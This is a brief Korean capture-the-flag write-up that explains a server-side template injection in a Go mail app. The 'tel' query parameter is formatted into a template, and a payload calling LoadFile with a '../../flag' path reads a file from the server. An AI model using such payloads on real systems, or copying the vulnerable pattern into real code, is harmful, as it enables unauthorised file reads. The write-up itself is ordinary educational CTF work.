[cce2023jr QUALS CTF] KMAIL

SSTI로 간단하게 풀리는 문제.

 main.go 파일의 215줄부터 보면,

tmpl := fmt.Sprintf(`
<p>--------------------------------------</p>
<table border="0" cellspacing="0" cellpadding="0">
	<tr>
		<td>
			<img src="data:image/png;base64,{{.File}}" style="heigth:90px;width:70px" alt="Profile Image">
		</td>
		<td valign="top" style="vertical-align: middle;">
			<strong>{{.Name}}</strong><br>
			<a href="mailto:{{.Email}}">{{.Email}}</a><br>
			<span>tel : %s</span>
		</td>
	</tr>
</table>`, r.URL.Query().Get("tel"))
t, err := template.New("page").Parse(tmpl)
if err != nil {
	fmt.Println(err)
}
t.Execute(w, &s)

%s 형태로 문자열이 들어가는 곳에서 SSTI 취약점이 발생하는 것을 확인할 수 있다.

?tel={{.Email}}을 입력했을 때 이메일이 tel 위치에 출력된다.

 

t.Execute(w,&s)를 통해 전달되는 s구조체에는 LoadFile이라는 함수도 포함되어 있으므로 이를 템플릿 구문에서 {{.LoadFile "../../flag"}} 형태로 실행할 수 있고 실행시 플래그가 나온다.

 

base64인코딩된 플래그 출력